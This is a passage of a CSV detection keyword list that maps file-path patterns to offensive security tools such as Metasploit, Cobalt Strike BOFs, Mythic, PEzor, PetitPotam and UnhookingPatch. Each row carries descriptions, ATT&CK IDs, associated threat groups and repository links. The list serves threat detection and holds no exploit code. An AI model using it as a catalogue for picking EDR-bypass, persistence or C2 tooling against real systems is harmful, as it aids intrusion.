+"*/password_brute.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/patchfinder64.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/PatchingAPI.cpp*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*/PatchingAPI.exe*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*/path_traversal.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/path_traversal_win32.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/path-mtu.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/payload_scripts*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*/payload_scripts/artifact*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*/payload_service.sh*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Payload_Type/athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Payload_Types/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/payload2.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*/payloads/DllLdr/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/payloads/payloads.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/payloads/util*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*/pcanywhere-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/pcworx-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/PDF_Payload/script.txt*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" +"*/pe/dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/PE/InjectPE.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*/pe_to_shellcode*","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2008","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" +"*/pe2shc.exe*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" +"*/pe2shc/*","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2008","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" +"*/PEASS-ng.git*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*/PEASS-ng/*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*/PeerToPeerService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/peinjector*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/peinjector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/pentest*","offensive_tool_keyword","_","pentest keyword detection. detect potential pentesters using this keyword in file name. repository or command line","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/PE-Obfuscator*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" +"*/perf_swevent64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/persist.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*/PersistBOF/*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*/Persistence.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/Persistence.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*/persistence/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1133","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/persistence/*.psm1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1134","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/Persistence/InstallUtil.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*/persistence2.rc*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/peterspbr/dirty-pipe-otw*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/peterspbr/dirty-pipe-otw","1","1","N/A","N/A","1","1","0","2022-03-10T03:42:15Z","2022-03-09T17:21:17Z" +"*/PetitPotam.git*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*/petitpotam.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/PEzor.cna*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/PEzor.git*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/PEzor.sh *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/PEzor/inject.cpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 